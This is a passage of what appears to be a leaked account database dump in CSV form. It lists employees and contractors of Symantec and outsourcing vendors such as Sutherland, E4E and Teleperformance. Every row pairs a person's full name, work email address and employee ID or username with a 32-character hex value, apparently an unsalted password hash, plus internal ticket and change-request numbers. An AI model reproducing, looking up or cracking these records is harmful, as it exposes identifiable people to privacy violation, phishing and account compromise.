rland,e0a7ed90cf7f3bebfcd170d854b66f63,Singh,<blank>,112630,Deepak,NULL,NULL,NUL
L
2b3b-4a6e-ade9-0be45c92b642,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518129,7644acee448c2ce05ddee1911b35fb65,Lanuzo,<blank>,124172,Mar
kEfren ,NULL,NULL,NULL
3142-4ba8-874e-909aa706cf9d,AY 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,7fba0cf7c04e416164f64ca70a30f413,Qureshi,<blank>,074228,Sajid,NULL,NULL,N
ULL
4e1-4156-a44c-b55a71ae7ea1,<blank>,<blank>,hanu.niraj@symantects.chnts.e4e.com,E
4E,fcc2a2856e413e3017f2a38c3c95daf1,Niraj,<blank>,Hanu_Niraj,Hanu,NULL,NULL,NULL
f7f6-484a-b7c3-120826174a37,CRQ000000671117--vmd--23/05/2012,<blank>,cherishgwen
delyn_sor@suth.com,sutherland,f8cd0ac783aa097626b2d89b43e2990b,Soria,<blank>,225
936,Cherish Gwendelyn,NULL,NULL,NULL
137b-4e44-8234-0ea7c33a4693,<blank>,<blank>,Jagannathan_CV_@symantec.com,<blank>
,07df887ec9d295b26d6081158b3f39fc,CV,<blank>,111530,Jagannathan,NULL,NULL,NULL
9d5-4636-963a-0a634b1f9c3e,<blank>,<blank>,khangenbam.singh@symantects.chnts.e4e
.com,E4E,0baa700c6f6ecebc3d06f45a4d190caa,Singh,<blank>,Khangenbam_Singh,Khangen
bam,NULL,NULL,NULL
78d-4b7f-9ad8-f20fdd9dce35,<blank>,<blank>,sunil.gavaskar@symanteccs.chnts.e4e.c
om,E4E,e92ead7e57146399ea5c2fb7722f0413,Gavaskar,<blank>,Sunil_Gavaskar,Sunil,NU
LL,NULL,NULL
f65-4e06-8c4f-28902e81b99b,<blank>,<blank>,bhargavi.natarajan@symanteccs.chnts.e
4e.com,E4E,bdede62943fd88d72a423197325ede34,Natarajan,<blank>,Bhargavi_Natarajan
,Bhargavi,NULL,NULL,NULL
66c1-4c12-a6fd-7ea608eb93db,<blank>,<blank>,JSathya_Narayanan@symantec.com,<blan
k>,e1c8d4852b23c5d48f101f6b74d10a45,Narayanan,<blank>,111841,JSathya,NULL,NULL,N
ULL
69b-4817-afbe-da6e31b118dc,<blank>,<blank>,melvin.gunasingh@symantects.chnts.e4e
.com,E4E,154f319f079a091366a2d806634e2096,Gunasingh,<blank>,Melvin_Gunasingh,Mel
vin,NULL,NULL,NULL
b75-414e-8315-a519346abbbb,<blank>,<blank>,elango.srinivasan@symantects.chnts.e4
e.com,E4E,6d8742b1ed6a4213ec83b044489b73d1,Srinivasan,<blank>,Elango_Srinivasan,
Elango,NULL,NULL,NULL
75f1-4be2-abce-8b151e6a4667,SRB 19.05.2010,EMPROV,symaccount@ipcdoctor.co.kr,PC
Doctor,da34d994c3c7d3c7f1c861c15982d9e1,Kawashima,<blank>,104875,Yumi ,NULL,NULL
,NULL
144-4a34-a840-0c3c618dc4da,<blank>,<blank>,arun.sevugamoorthy@symanteccs.chnts.e
4e.com,E4E,9c57db9a58130e57f422ca3fad526bd0,Sevugamoorthy,<blank>,Arun_Sevugamoo
rthy,Arun,NULL,NULL,NULL
251-41e2-ab86-9524f69c8458,<blank>,<blank>,narayanan.r@symanteccs.chnts.e4e.com,
E4E,755e6e0463ba35492808bb737637d3a9,R,<blank>,Narayanan_R,Narayanan,NULL,NULL,N
ULL
065-4141-a92d-24b620c65e06,<blank>,<blank>,sathish.ramaswamy@symanteccs.chnts.e4
e.com,E4E,94d451bfb258faf4edd14e2efc984ada,Ramaswamy,<blank>,Sathish_Ramaswamy,S
athish,NULL,NULL,NULL
36c8-4e19-b90d-0dd89b67554a,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518101,704138b3689d1c2f6848b59da8e153a6,Abarrientos,<blank>,12416
4,Minersa ,NULL,NULL,NULL
f54-46f7-964c-02ad651f6911,<blank>,<blank>,ashok.srinivasan@symanteccs.chnts.e4e
.com,E4E,24aba13979ba76c08917856a8d22524a,Srinivasan,<blank>,Ashok_Srinivasan,As
hok,NULL,NULL,NULL
e56-4140-b1f9-99366943c293,<blank>,<blank>,sabita.sinha@symantects.chnts.e4e.com
,E4E,b5f2670b05194968037608bd9a12e214,Sinha,<blank>,Sabita_Sinha,Sabita,NULL,NUL
L,NULL
ca4-4ae3-b626-c94da574df1b,<blank>,<blank>,anto.vivek@symantects.chnts.e4e.com,E
4E,c1ff12c3e50ed64a13e2e017f7af5a45,Vivek,<blank>,Anto_Vivek,Anto,NULL,NULL,NULL
998-40af-946d-7cfb613ecbf3,<blank>,<blank>,sathish.santharram@symantects.chnts.e
4e.com,E4E,1bea6aaeb03e46c7507784b847d96812,Santharram,<blank>,Sathish_Santharra
m,Sathish,NULL,NULL,NULL
28df-4004-baf0-2e5486527029,"CRQ000000830072 CLNP Oct 08,2012",000-0000,jugrad_m
ortera@symantec.com,Symantec,1124edaf29648c28037ba8376ae99f78,Mortera,<blank>,23
0612,Jugrad,NULL,NULL,NULL
5ad-4f2e-9a60-4ebbd003ac57,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,5fea
d9df5fe63276cb1fd369d33e8854,Nazeer,<blank>,Syed_Nazeer,Syed,NULL,NULL,NULL
08b2-4bec-a7fc-18fb7f297675,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518126,8750d2bf597b4cfcd34185791349ce23,Jimenez,<blank>,124171,Na
ncy ,NULL,NULL,NULL
b7ae-4c71-831b-58f6189c691f,<blank>,<blank>,Michael_Tranquillo@SPI.COM,PM - 6/14
/2012 - CRQ000000694626,6e5be6ec00d81603c919754b9469dcc6,Tranquillo,<blank>,2267
44,Michael,NULL,NULL,NULL
0760-4aef-ac36-7ba4e4a12480,<blank>,<blank>,Kriss_Encarguez@SPI.COM,PM - 6/14/20
12 - CRQ000000694707,fa3becb8c6a6970aa91ac1b2fcfb1167,Encarguez,<blank>,226754,K
riss,NULL,NULL,NULL
e8c-4bce-83ac-c37f1da8dd82,<blank>,<blank>,rajesh.kumar@symanteccs.chnts.e4e.com
,E4E,a0d60f954036a9dc50344017c4a35d39,Kumar,<blank>,Rajesh_Kumar1,Rajesh,NULL,NU
LL,NULL
c42-4fe5-b66b-0a51f12a2bef,<blank>,<blank>,s.kumara@symanteccs.chnts.e4e.com,E4E
,1f160802925a2d6b9f2ce4e9e4977298,Kumara,<blank>,S_Kumara,S,NULL,NULL,NULL
959d-4108-9578-ce02ad9f6366,<blank>,<blank>,toru_kishi@symantec.com,Symantec,dbf
991f63cf5e968b5c4f0d08f74794b,Kishi,<blank>,toru_kishi,Toru,NULL,NULL,NULL
c5eb-42ea-a720-f8d1a0caaba1,CRQ000000671127--vmd--23/05/2012,<blank>,rajneesh_ti
wary@suth.com,sutherland,6e4ea448b8e5298b2ba914a3a2ac9070,Tiwary,<blank>,225938,
Rajneesh,NULL,NULL,NULL
fc2-49a0-93a5-33ab5d4c7ebb,<blank>,<blank>,arti.mishra@symantec.ts.e4e.com,E4E,6
7d7cbf82b1dc22c8ad4b18029a526b4,Mishra,<blank>,Arti_Mishra,Arti,NULL,NULL,NULL
6dc-48d7-8a0d-350d306d5739,<blank>,<blank>,ashraf.b@symantec.ts.e4e.com,E4E,8379
e5a8e2e0d7dc7d6916800b4cb012,Begum,<blank>,Ashraf_Begum,Ashraf,NULL,NULL,NULL
389b-409a-bd03-53a0015758de,<blank>,<blank>,michael_idolor@suth.com,CT - 28/06/2
012 - CRQ000000711684,aba5b7f48481dd3ed23bd049ab24ab5d,Idolor,<blank>,226993,Mic
hael,NULL,NULL,NULL
52c4-473e-982a-ec1ef089e6c5,<blank>,EMPROV,tools_id@symantec.suth.com,<blank>,bf
39be9029e7bbb78a69d38d3c2e72c3,Mathews,<blank>,089097,Sarah,NULL,NULL,NULL
77e-45a2-9e4e-e560a557f9e6,<blank>,<blank>,darshan.sreedharan@symantec.ts.e4e.co
m,E4E,936d3bbdccad698ce00d93a4d824b154,Shreedharan,<blank>,Darshan_Shreedharan,D
arshan,NULL,NULL,NULL
269-46f8-bc60-d40ade3ec7dc,<blank>,<blank>,deepesh.valsraj@symantec.ts.e4e.com,E
4E,efb60edf98859e9d1cce6d2050f33f96,Valsaraj,<blank>,Deepesh_Valsaraj,Deepesh,NU
LL,NULL,NULL
2c77-4bbc-9766-3e4c5a836698,<blank>,<blank>,neil_portes@suth.com,CT - 28/06/2012
- CRQ000000711687,1b1332dbe7d53e7fda7f0acb986fc26a,Portes,<blank>,226994,Neil,N
ULL,NULL,NULL
585e-4883-8b7c-c3cf64bbd2a8,<blank>,<blank>,timothy_santiago@suth.com,CT - 28/06
/2012 - CRQ000000711693,44c25f56acbc8a93a8bc512dfb086a22,Santiago,<blank>,227002
,Timothy,NULL,NULL,NULL
5ca-4bf3-bf52-ff7f9bb8ba8e,<blank>,<blank>,arjun.krishna@symantects.chnts.e4e.co
m,E4E,250db03824e29da301f4046029d69c69,Krishna,<blank>,Arjun_Krishna,Arjun,NULL,
NULL,NULL
27c-4ed5-a2a4-179f9a7dcda6,<blank>,<blank>,accounts@symantec.teleperformance.gr,
Symantec,be1e2344f614019b7265c00231ab13ad,Efthymiou,<blank>,leonidas_efthymiou,L
eonidas,NULL,NULL,NULL
d3bc-42b1-a114-679fe4fbcfb3,CRQ000000671118--vmd--23/05/2012,<blank>,joanah_vega
@suth.com,sutherland,1243bc8cb05f93a430529ea550d67331,Vega,<blank>,225937,Joanah
,NULL,NULL,NULL
d9e-4058-97f5-47cdf3669a8d,<blank>,<blank>,veerendra.chakrasali@symantec.india.i
seva.com,E4E,39b94ca0de7345cc5285e46b3d4dc716,C B,<blank>,Veerendra_CB,Veerendra
,NULL,NULL,NULL
dc7-42dc-978c-4909bbc2ba1d,<blank>,<blank>,dilip.k@symanteccs.chnts.e4e.com,E4E,
31f51bdfe6ec7138cef756c5274e9570,K,<blank>,Dilip_K,Dilip,NULL,NULL,NULL
f3e-42a7-aad5-23a8eecdcf27,<blank>,<blank>,prabhakar.eswaran@symantects.chnts.e4
e.com,E4E,c10d5df1712e27d5a6e2cfb6add1f860,Eswaran,<blank>,Prabhakar_Eswaran,Pra
bhakar,NULL,NULL,NULL
8883-4955-81f9-d8e01f02f947,<blank>,<blank>,Sunil_G_A@symantec.com,Symantec,c81c
6b6e75488c84dbaa80d294e5f293,G A,<blank>,111843,Sunil,NULL,NULL,NULL
1f15-49a7-aa37-44815f1791ef,<blank>,<blank>,Mermerie_Gubat@SPI.COM,PM - 6/14/201
2 - CRQ000000694637,3bce8080e79d7c2f77c4a655f82a52b2,Gubat,<blank>,226746,Mermer
ie,NULL,NULL,NULL
d0f-44ad-b10f-cf4d4758572b,<blank>,<blank>,ramkumar.c@symantects.chnts.e4e.com,E
4E,3ff1d4bee168d89bc0096d9fdd8075f1,C,<blank>,Ramkumar_C1,Ramkumar,NULL,NULL,NUL
L
3fd-484f-b122-a6ed42456e58,<blank>,<blank>,aruna.rangaswamy@symantec.ts.e4e.com,
E4E,4d48c3893045797794454d7c9feef99b,Rangaswamy,<blank>,Aruna_Rangaswamy,Aruna,N
ULL,NULL,NULL
cb8e-406a-bdeb-212d4233d4ea,CRQ000000709695--vmd--26/06/2012,000-000,gaurav_sule
@suth.com,Sutherland,46eaf79c971e4933fbcd476d9bcd39ee,Sule,<blank>,115578,Gaurav
,NULL,NULL,NULL
3680-43b1-9e3f-5f515d52c470,CRQ000000709695--vmd--26/06/2012,<blank>,lenorejane_
quenoviva@suth.com,sutherland,b619fae23fed8fbeace8e6b0f3537db5,QuenovivaDal Dogu
il,<blank>,101626,LenoreJane,NULL,NULL,NULL
c7a0-49d8-beae-25511e563333,"CRQ000000830186 CLNP Oct 08,2012",000-0000,josepaol
o_joven@symantec.com,Symantec,7f02a644d021c7f0470c6fc0d4b6bbfa,Joven,<blank>,230
622,Jose Paolo,NULL,NULL,NULL
13d1-48c1-8c20-1e5398f5384f,CRQ000000712787--vmd--28/06/2012,<blank>,prashant_ma
hankar@suth.com,sutherland,acc151a3c0712abb3ffbc5841af2820e,Mahankar,<blank>,227
065,Prashant,NULL,NULL,NULL
2272-4ed7-a1d3-1ee0b663e31c,CRQ000000712787--vmd--28/06/2012,<blank>,azharahmed_
sardar@suth.com,sutherland,d2be353e7fa4b089e7e8e473175d1f57,Sardar,<blank>,22706
6,Azhar Ahmed,NULL,NULL,NULL
4568-428e-9995-49f258142587,AY 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,ba7e5c2b6770787542c7d6689684eb63,Rajput,<blank>,074206,Ravindra,NULL,NULL
,NULL
5212-4e6b-b8a9-2dfed5e95508,<blank>,<blank>,gabriel_wilson@symantec.com,Symantec
,6f6872a881089a03f2b5c352c73e1918,Wilson,<blank>,gabriel_wilson,Gabriel,NULL,NUL
L,NULL
af3c-4a79-a632-25df0921aa46,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,8
cbbe616f155a0bc36f06498a392c5cd,Toshniwal,<blank>,113666,Jitendra,NULL,NULL,NULL
808-4b55-9dbe-995db2c18b1c,<blank>,<blank>,mohammed.azhar@symantec.ts.e4e.com,E4
E,db9a390c864bc01972d764b6bf464c3c,Azhar Hussain,<blank>,Mohammed_Azhar Hussain,
Mohammed,NULL,NULL,NULL
a8a-4b5b-b602-83b1be5c0359,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland,
73cc93cc4ee95e288ea6612961a21362,V,<blank>,091802,Srikant,NULL,NULL,NULL
220f-4636-a740-8dce9be9b0ad,<blank>,EMPROV,tools_id@symantec.suth.com,SUTHERLAND
,19fdfbcac717870f0a077ee56b937bfb,Soman,<blank>,097968,Vinod,NULL,NULL,NULL
d7fd-4d16-bc12-2a99dc980039,CRQ000000718060--vmd--03/07/2012,<blank>,balaji_kuma
r1@suth.com,sutherland,bcd5a4f01ce5565093b8d6b6328d737e,Kumar,<blank>,227396,Bal
aji,NULL,NULL,NULL
2b8-40f1-aa1e-674a84bc7bd1,<blank>,<blank>,ramya.pillai@symantec.ts.e4e.com,E4E,
524aa65df0a4ad2687466d0acb6bf9dc,Pillai,<blank>,Ramya_Pillai,Ramya,NULL,NULL,NUL
L
a571-4dd0-9a59-c7ddfcf1c9e4,"CRQ000000830189 CLNP Oct 08,2012",000-0000,ianjosep
h_angelio@symantec.com,Symantec,776d1a3d607c934c0ab0ca5269c13a90,Angelio,<blank>
,230623,Ian Joseph,NULL,NULL,NULL
f2de-48f4-9a5e-63bf2d2738ec,WS 31-08-2010,INC000000254142,carl_sarlabus@symantec
.com,Symantec,a86d569e68577424e5df509f39d99fef,Sarlabus,<blank>,carl_sarlabus,Ca
rl,NULL,NULL,NULL
1358-4b58-93ab-c5b65b6122dc,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,be52595c20fce31ab39cf2813a45b15e,R,<blank>,088323,Gnanam,NULL,NULL,NULL
6d52-427e-81d1-1de38d15e43a,"CRQ000000830090 CLNP Oct 08,2012",000-0000,marlon_m
asamoc@symantec.com,Symantec,f9cf70edd2ab1e3f20608a4881f3516f,Masamoc,<blank>,23
0621,Marlon,NULL,NULL,NULL
9ba-4fcf-8f72-27a620d402d9,<blank>,<blank>,pravine.thom@symanteccs.chnts.e4e.com
,E4E,e7834979e6b5d48569987b39479c02c0,Thom,<blank>,Pravine_Thom,Pravine,NULL,NUL
L,NULL
446-4098-b428-84cab29538b3,<blank>,<blank>,srinivasan.sundar@symanteccs.chnts.e4
e.com,E4E,c84f7c835eaa92a4634863058bd4ec28,Sundar,<blank>,Srinivasan_Sundar,Srin
ivasan,NULL,NULL,NULL
8591-4d7c-88a5-5aac406aa31c,CRQ000000346789-CLNP-28/09/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,60c21839aadb481b8f10c607bd274464,A,<blank>,120915,Ela
maran,NULL,NULL,NULL
7b4-416e-94c3-8b8fc4d0d4ab,<blank>,<blank>,brijeash.kathiresan@symanteccs.chnts.
e4e.com,E4E,3b1924186267d67a2289f3e0421b9a22,Kathiresan,<blank>,Brijeash_Kathire
san,Brijeash,NULL,NULL,NULL
1c3a-46cf-8007-119b3022058e,nam-08-31-10,nam-08-31-10,tools_id@symantec.suth.com
,Sutherland,7d559dadd6ac956639aae719a11a1938,Silvera,<blank>,094969,PPringle,NUL
L,NULL,NULL
847-430c-b7b1-927cdacd813b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland,
1e43c7a392b3dd60b575cfdaf9ac6542,EvelynA,<blank>,091795,Kamala,NULL,NULL,NULL
1c4-430c-8f84-7d3ddd72c477,<blank>,<blank>,jon-artur.maddoock-holte@teleperforma
nce.se,Archived Teleperformance Nordic,cf68e9fa974fc1df27f4535f55165221,Maddock-
Holte,<blank>,Jon_Holte,Jon-Arthur,NULL,NULL,NULL
589e-4cb7-aa33-90f2cb6aa9d0,<blank>,<blank>,Harini_S@symantec.com,<blank>,080882
96209495dd6aeafeae2c4ebf19,S,<blank>,111800,Harini,NULL,NULL,NULL
7f6-4e9d-80b4-677727a88bcc,<blank>,<blank>,sathiskumar.r@symantects.chnts.e4e.co
m,E4E,a5c92921bf68440917d1750655f843ca,R,<blank>,Sathiskumar_R,Sathiskumar,NULL,
NULL,NULL
7d8-443a-b814-8f8016d5a563,<blank>,<blank>,alvin.v@ts.e4e.com,E4E,b5ef6240db3a61
ae993c57d3f6a532b2,Vijay Kumar,<blank>,Alwin_Vijay Kumar,Alwin,NULL,NULL,NULL
4f95-486d-8efb-c2b6a45cbaa1,<blank>,<blank>,silvina_puccio@Teleperformance.com,P
M - 7/6/2012 - CRQ000000722927,3e9d1942bd7c1786fb2f598912462642,Puccio,<blank>,2
27732,Silvina,NULL,NULL,NULL
da6b-4a83-98cf-4e1512bbc226,CRQ000000724024--vmd--09/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,ecdb792384855b70c2b3db3b6c861df5,Konda,<blank>,227157
,Rahul,NULL,NULL,NULL
8c5f-4893-a625-1ac8fa3b6581,CRQ000000346820 SP 28 Sep 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,30269f6cc7a1e5c6467fc3d4024a5113,Shalini A,<blank>,120
925,Baby,NULL,NULL,NULL
e1e9-4d77-bfc6-36698c617430,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
725198 - PR - 10th July 2012,69216574d776462308c32abae5463c9c,Sio,<blank>,226480
,Maria Crizelda ,NULL,NULL,NULL
edc5-4561-9a97-554a1f44f220,<blank>,<blank>,david_lau@symantec.com,Symantec,0f00
e9d7c03725839814c8ec3c0363f9,Lau,<blank>,david_lau,David,NULL,NULL,NULL
2a0-4f23-9910-e7b0c511ff1c,<blank>,<blank>,swati.roy@ts.e4e.com,E4E,cb6cdf8cf1b2
0ff0625eaff3c83701c6,Roy,<blank>,Swati_Roy,Swati,NULL,NULL,NULL
e181-4e52-b5d6-08fc1dc3ced3,CRQ000000460066 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,6c96b0192c05b15764a80314de88bf2b,Lugtu,<blank>,123200,
Angelica Mae Boiles,NULL,NULL,NULL
ec70-4a05-9e2a-85a9987c7bae,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,1e99ea168f3468b64f47935b143e1046,A S,<blank>,114193,Susham
a,NULL,NULL,NULL
f8e7-404d-93da-ffd0c137a1ca,<blank>,<blank>,elias_el-haddad@symantec.com,Symante
c,adc5e8ba297dee674425d4f218958e2c,El-Haddad,<blank>,elias_elhaddad,Elias,NULL,N
ULL,NULL
d94e-498f-bc43-f471483d3fc0,<blank>,EMPROV,tools_id@symantec.suth.com,<blank>,0e
0997a8b594f251d08676573ca884a5,Babu,<blank>,09338,Raghavendra,NULL,NULL,NULL
41fb-46b0-829d-3384f490a976,nam-08-31-10,INC000000254496,tools_id@symantec.suth.
com,Sutherland,0c20732cf162ccda5fe1b8b2c53733a9,R,<blank>,092195,Dhanasekran,NUL
L,NULL,NULL
3a94-448c-9839-a7273b322391,CRQ000000460069 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,1277770c2630b526937a147aa20bb2c0,Castrillo,<blank>,123
202,Glen Mazer Pacaldo,NULL,NULL,NULL
d453-4c22-92cd-de04087de918,CRQ000000460072 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,bc9d1410d5fe9bafae494df0a7b72cf9,Dela Ro,<blank>,12320
3,Maria Angelie De Villa,NULL,NULL,NULL
c849-49a3-826c-744a6a36a508,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a9e3635f56523abf8b5b0f1c9b8b1e21,Kumar V R,<blank>,094252,Deepak ,NULL,NULL,NUL
L
07b-4b33-8e4a-4fe66638a707,<blank>,<blank>,arun.chandodi@symantec.ts.e4e.com,E4E
,8b6027728420ba7b443a66bc76895aa7,Chandodi,<blank>,Arun_Chandodi,Arun,NULL,NULL,
NULL
f9f-4913-bfcb-e69360f02301,<blank>,<blank>,ashish.bhimsera@symantec.ts.e4e.com,E
4E,08fed8826f986c8464f777a7611ef494,Bhimseria,<blank>,Ashish_Bhimseria,Ashish,NU
LL,NULL,NULL
01d-44d4-aa78-e1e77f04398e,<blank>,<blank>,syed.sayabu@symanteccs.chnts.e4e.com,
E4E,dd508acabdfa06c5ebc592a491ad56f9,Sayabu,<blank>,Syed_Sayabu,Syed,NULL,NULL,N
ULL
f557-4cc2-bb3e-9670f41b7d68,<blank>,<blank>,symantec_2nd_maa@tp-tec.nl,CRQ000000
209632 - PR - 2/28/2011,cc7e0510734dc327afe0d7b01b069b50,Hendriks,<blank>,112626
,Bjorn \t,NULL,NULL,NULL
822-434c-87e2-ec28aec78837,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland,
dd24a5970dcec3afc558f1616079cf10,ShindeG,<blank>,091720,Madhukar,NULL,NULL,NULL
a396-4dcb-b6d2-dc074a68b7f6,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-REQ000001213453,f87679ef2fad07825325ec631614e459,Dayrit,<blank>,124181,Ron
ald,NULL,NULL,NULL
fdb1-4892-853d-275a18d20e8d,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518176,debfba76eb0a66dfe50d210e05f7ee9c,Domagas,<blank>,124182,Je
ssica ,NULL,NULL,NULL
d4a-495d-8d57-b42f9db4afcc,<blank>,<blank>,aravind.Kalgudi@symantec.ts.e4e.com,E
4E,e32750cf77d8f360f69b64eac2bd2b3f,Kalgudi,<blank>,Aravind_Kalgudi,Aravind,NULL
,NULL,NULL
a4ba-4d4a-808b-d4bbc7498535,<blank>,EMPROV,Steve_Menachemson@Symantec.com,Symant
ec,35aa895f800ad8a344cd98c9fd95cbda,Menachemson,<blank>,094332,Steve,NULL,NULL,N
ULL
c021-49d4-b666-bc2b4958d6c3,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,551e02f575a75bd3b684189c652c4146,Chandrasekar Paul,<blank>,075568,Vinod,N
ULL,NULL,NULL
1f62-4d22-a2c9-6119f92f2989,PM - 5/20/2011 - CRQ000000261337,<blank>,tools_id@sy
mantec.suth.com,<blank>,3a53e4991a97a6df4a012a9850dd8bea,Khan,<blank>,115847,Kas
han,NULL,NULL,NULL
f27-48a5-88a1-acbe8d459997,<blank>,<blank>,sanoj.subramaniam@symantec.ts.e4e.com
,E4E,720501e7c67bcc1fe06d752f76aaf110,Subramaniam,<blank>,Sanoj_Subramaniam,Sano
j,NULL,NULL,NULL
13b5-40aa-a472-fc12e4ad8ebb,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518184,ea271fed93bb12e6e4ec132a3f194694,Esquivel,<blank>,124183,R
eyJohn,NULL,NULL,NULL
39e0-442a-a623-e09efc7ece3f,PM - 5/20/2011 - CRQ000000261343,<blank>,tools_id@sy
mantec.suth.com,<blank>,5b01b850b90949fa581aee595fb21139,Khan,<blank>,115849,Muj
assim,NULL,NULL,NULL
0ec-431c-ae55-e88db38f7979,<blank>,<blank>,susai.vijay@ts.e4e.com,E4E,ffd2cafad4
5c0fcd29b913ce29ef0295,Vijay,<blank>,Susai_Vijay,Susai,NULL,NULL,NULL
4804-49c5-96c7-d5d39e4056d1,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518188,41fe568e131934af107f6dda77b9fd2e,Hernandez,<blank>,124184,
Jose,NULL,NULL,NULL
23a-4e25-9a93-abcfc43c5d1b,<blank>,<blank>,anoop.indirabhai@symantec.ts.e4e.com,
E4E,0f7146ef2586ab1ad0219c2e233d4b65,SI,<blank>,Anoop_SI,Anoop,NULL,NULL,NULL
8b0-428c-b35c-053cf1a292c8,<blank>,<blank>,anup.meenappally@symantec.ts.e4e.com,
E4E,3fa57a2828ba7b6d4d1c36312263bf55,Meenappally,<blank>,Anup_Meenappally,Anup,N
ULL,NULL,NULL
e8f-47af-956b-fa66a62cfeff,<blank>,<blank>,arpit.chowdhury@symantec.ts.e4e.com,E
4E,92636742efd694dfdacdd47bad881d81,Roy,<blank>,Arpit_Roy,Arpit,NULL,NULL,NULL
cb6-4ac7-b4ad-60e9489e5865,<blank>,<blank>,birendra.majhi@symantec.ts.e4e.com,E4
E,7569a0a04d7581d1484bc90c5a6f5b02,Kumar,<blank>,Birendra_Kumar,Birendra,NULL,NU
LL,NULL
5c6-4f61-8859-32d2281087e8,<blank>,<blank>,chetan.chakravarthy@symantec.ts.e4e.c
om,E4E,174a699cc7476de16cd355505e4a557e,C,<blank>,Chetan_C,Chetan,NULL,NULL,NULL
b2c-49e8-8311-fe610290ad3d,<blank>,<blank>,dany.jesudas@symantec.ts.e4e.com,E4E,
bafbd9c3f78e0e4e227433e55acf8018,Sahayam,<blank>,Dany_Sahayam,Dany,NULL,NULL,NUL
L
e52-44af-b306-3bd7d9925b20,<blank>,<blank>,deepak.k@symantec.ts.e4e.com,E4E,74a3
b2a88d46c3a0b8783d1703dafed4,Dash,<blank>,Deepak_Dash,Deepak,NULL,NULL,NULL
20d4-4e6e-9222-1aa1f1e96e9d,SSS 12/01/10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,3e295c4a4993f5ff9ded8d6fa025b31c,Ambooken,<blank>,098424,Ann,NULL,NULL,NUL
L
9a0d-4e5d-82d5-199648a09efc,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518202,e3173c5360606af14d3074df6f306076,Morales,<blank>,124187,Ch
ristopherLemuel ,NULL,NULL,NULL
27f-4956-8fa0-4839dc666aad,<blank>,<blank>,ibraheem.ovais@symantec.ts.e4e.com,E4
E,11b82a315f1f7b4a70ce7f08eb4b3fce,Ovais,<blank>,Ibraheem_Ovais,Ibraheem,NULL,NU
LL,NULL
504-43aa-b805-d056d889b87c,<blank>,073782,Ming_Chai@symantec.com,e4e,92229500957
3801d1e5864016d7c51f3,K,<blank>,Abdul_K,Abdul ,NULL,NULL,NULL
5a37-4726-9b27-0e2b0bf6ecee,12/01/2010 - SPJ,EMPROV/CRQ292,Michaela_Mentelova@Sy
mantec.com,Symantec,d70421c323546cd809fb061f139b6c18,Mentelova,<blank>,096017,Mi
chaela,NULL,NULL,NULL
4c4-47e2-b401-9515a6612d1d,<blank>,<blank>,arvinda.ashok@symantec.ts.e4e.com,E4E
,cf37a1ebbe5eb58e2d3e071f9ca3f2ec,Ashok,<blank>,Arvinda_Ashok,Arvinda,NULL,NULL,
NULL
bd6-41bd-a845-626a79ea858c,<blank>,<blank>,john.alexander@symantec.ts.e4e.com,E4
E,7fef23784b32ad00f747b8286ca817ad,Alexander M,<blank>,John_Alexander_M,John,NUL
L,NULL,NULL
9532-4fad-8de8-c381bbeddef0,<blank>,<blank>,junga.offermans@teleperformance.nl,P
M - 11/7/2011 - CRQ000000393142,99c0b058ab22c6ad203e809518f4ed9a,Offermans,<blan
k>,122137,Junga,NULL,NULL,NULL
a91f-4b2d-9329-dcb92ba56a9b,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518119,89299d7458c65508a82ae36b65cdaa45,Ferrer,<blank>,124169,Ber
nard ,NULL,NULL,NULL
3a5-470c-bb7f-7bce83ad2ef8,<blank>,<blank>,kiran.janardhanan@symantec.ts.e4e.com
,E4E,4c579ac4f28616e53f9a6364781f6fbf,P,<blank>,Kiran_P,Kiran,NULL,NULL,NULL
a31-4e57-8c72-b2cce29c3573,<blank>,<blank>,krishnakumar.s@symantec.ts.e4e.com,E4
E,cf16747d7688d942995811a714833b25,KumarS,<blank>,Krishna_KumarS,Krishna,NULL,NU
LL,NULL
ff35-42c9-beb6-2c0ea96ed5ae,<blank>,<blank>,hendrik_bunardy@symantec.com,Symante
c,7176b8a6a4446339a3d8b4fc9c41f5c4,Bunardy,<blank>,hendrik_bunardy,Hendrik,NULL,
NULL,NULL
4093-4c36-bd59-baf687348ccc,PM - 7/3/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,3a682b3a3f40c9b8a7307fc8cd3d8fd8,Panaligan,<blank>,113669,Jhonnaliamarch,NU
LL,NULL,NULL
764-446a-ab0b-bc67b5f8f0f8,<blank>,<blank>,lovin.george@symantec.ts.e4e.com,E4E,
bdc67406719da72e38fa3bac430262f0,George,<blank>,Lovin_George,Lovin,NULL,NULL,NUL
L
791-4644-85d3-12cf8b87a135,<blank>,<blank>,mubin.ahmed@symantec.ts.e4e.com,E4E,6
4c96b1d37e5454cc6c0b85c3da2f7db,Ahmed,<blank>,Mubin_Ahmed,Mubin,NULL,NULL,NULL
